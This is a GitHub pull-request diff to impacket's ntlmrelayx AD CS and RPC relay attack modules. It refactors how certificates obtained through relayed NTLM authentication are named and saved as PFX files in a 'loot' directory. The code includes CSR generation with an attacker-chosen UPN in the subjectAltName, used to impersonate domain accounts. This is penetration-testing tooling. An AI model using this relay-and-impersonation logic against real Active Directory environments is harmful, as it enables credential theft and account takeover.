Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
70 changes: 55 additions & 15 deletions impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,9 +20,11 @@
import os
from OpenSSL import crypto

from cryptography import x509
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.hazmat.primitives.serialization import NoEncryption
from cryptography.x509 import load_pem_x509_certificate, load_der_x509_certificate
from cryptography.x509 import ExtensionNotFound, load_pem_x509_certificate
from cryptography.x509.oid import NameOID, ObjectIdentifier
from cryptography.hazmat.backends import default_backend


Expand All @@ -34,6 +36,7 @@


class ADCSAttack:
UPN_OID = ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")

def _run(self):
key = crypto.PKey()
Expand Down Expand Up @@ -85,17 +88,20 @@ def _run(self):
LOG.info("GOT CERTIFICATE! ID %s" % certificate_id)
certificate = response.read().decode()

certificate_store = self.generate_pfx(key.to_cryptography_key(), certificate)
LOG.info("Writing PKCS#12 certificate to %s/%s.pfx" % (self.config.lootdir, self.username))
cert_obj = load_pem_x509_certificate(certificate.encode(), backend=default_backend())
pfx_filename = self._sanitize_filename(self.username or self._extract_certificate_identity(cert_obj) or "certificate_{0}".format(certificate_id))
certificate_store = self.generate_pfx(key.to_cryptography_key(), cert_obj)
output_path = os.path.join(self.config.lootdir, "{}.pfx".format(pfx_filename))
LOG.info("Writing PKCS#12 certificate to %s" % output_path)
try:
if not os.path.isdir(self.config.lootdir):
os.mkdir(self.config.lootdir)
with open("%s/%s.pfx" % (self.config.lootdir, self.username), 'wb') as f:
with open(output_path, 'wb') as f:
f.write(certificate_store)
LOG.info("Certificate successfully written to file")
except Exception as e:
LOG.info("Unable to write certificate to file, printing B64 of certificate to console instead")
LOG.info("Base64-encoded PKCS#12 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
LOG.info("Base64-encoded PKCS#12 certificate (%s): \n%s" % (pfx_filename, base64.b64encode(certificate_store).decode()))
pass

if self.config.altName:
Expand All @@ -105,29 +111,24 @@ def _run(self):
def generate_csr(key, CN, altName, csr_type = crypto.FILETYPE_PEM):
LOG.info("Generating CSR...")
req = crypto.X509Req()
req.get_subject().CN = CN

if CN:
req.get_subject().CN = CN

if altName:
req.add_extensions([crypto.X509Extension(b"subjectAltName", False, b"otherName:1.3.6.1.4.1.311.20.2.3;UTF8:%b" % altName.encode() )])


req.set_pubkey(key)
req.sign(key, "sha256")

return crypto.dump_certificate_request(csr_type, req)

@staticmethod
def generate_pfx(key, certificate, cert_type=crypto.FILETYPE_PEM):

if cert_type == crypto.FILETYPE_PEM:
cert=load_pem_x509_certificate(certificate.encode(), backend=default_backend())
else: #ASN1/DER
cert=load_der_x509_certificate(certificate.encode(), backend=default_backend())

def generate_pfx(key, certificate):
pfx_data = pkcs12.serialize_key_and_certificates(
name=b"",
key=key,
cert=cert,
cert=certificate,
cas=None,
encryption_algorithm=NoEncryption()
)
Expand All @@ -139,3 +140,42 @@ def generate_certattributes(template, altName):
if altName:
return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName)
return "CertificateTemplate:{}".format(template)

@classmethod
def _extract_certificate_identity(cls, cert):
try:
common_names = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)
for attribute in common_names:
value = attribute.value.strip()
if value:
return value
except Exception:
pass

try:
san_extension = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
san = san_extension.value
for other_name in san.get_values_for_type(x509.OtherName):
if other_name.type_id == cls.UPN_OID:
value = other_name.value
if isinstance(value, bytes):
value = value.decode('utf-8', errors='ignore')
value = value.strip()
if value:
return value
for dns_name in san.get_values_for_type(x509.DNSName):
value = dns_name.strip()
if value:
return value
except ExtensionNotFound:
pass
except Exception:
pass

return None

@staticmethod
def _sanitize_filename(name):
sanitized = re.sub(r'[^A-Za-z0-9._-]', '_', name)
sanitized = sanitized.strip("._")
return sanitized
16 changes: 12 additions & 4 deletions impacket/examples/ntlmrelayx/attacks/rpcattack.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,8 @@
import random

from OpenSSL import crypto
from cryptography.x509 import load_der_x509_certificate
from cryptography.hazmat.backends import default_backend

from impacket import LOG
from impacket.dcerpc.v5 import tsch, icpr
Expand Down Expand Up @@ -156,19 +158,25 @@ def _run(self):

ELEVATED.append(self.username)

certificate_store = ADCSAttack.generate_pfx(key, certificate, crypto.FILETYPE_ASN1)
LOG.info("Writing PKCS#12 certificate to %s/%s.pfx" % (self.config.lootdir, self.username))
cert_obj = load_der_x509_certificate(certificate, backend=default_backend())
pfx_filename = ADCSAttack._sanitize_filename(self.username or ADCSAttack._extract_certificate_identity(cert_obj) or "certificate")
certificate_store = ADCSAttack.generate_pfx(key.to_cryptography_key(), cert_obj)
output_path = os.path.join(self.config.lootdir, "{}.pfx".format(pfx_filename))
LOG.info("Writing PKCS#12 certificate to %s" % output_path)
try:
if not os.path.isdir(self.config.lootdir):
os.mkdir(self.config.lootdir)
with open("%s/%s.pfx" % (self.config.lootdir, self.username), 'wb') as f:
with open(output_path, 'wb') as f:
f.write(certificate_store)
LOG.info("Certificate successfully written to file")
except Exception as e:
LOG.info("Unable to write certificate to file, printing B64 of certificate to console instead")
LOG.info("Base64-encoded PKCS#12 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
LOG.info("Base64-encoded PKCS#12 certificate (%s): \n%s" % (pfx_filename, base64.b64encode(certificate_store).decode()))
pass

if self.config.altName:
LOG.info("This certificate can also be used for user : {}".format(self.config.altName))

class RPCAttack(ProtocolAttack, TSCHRPCAttack):
PLUGIN_NAMES = ["RPC"]

Expand Down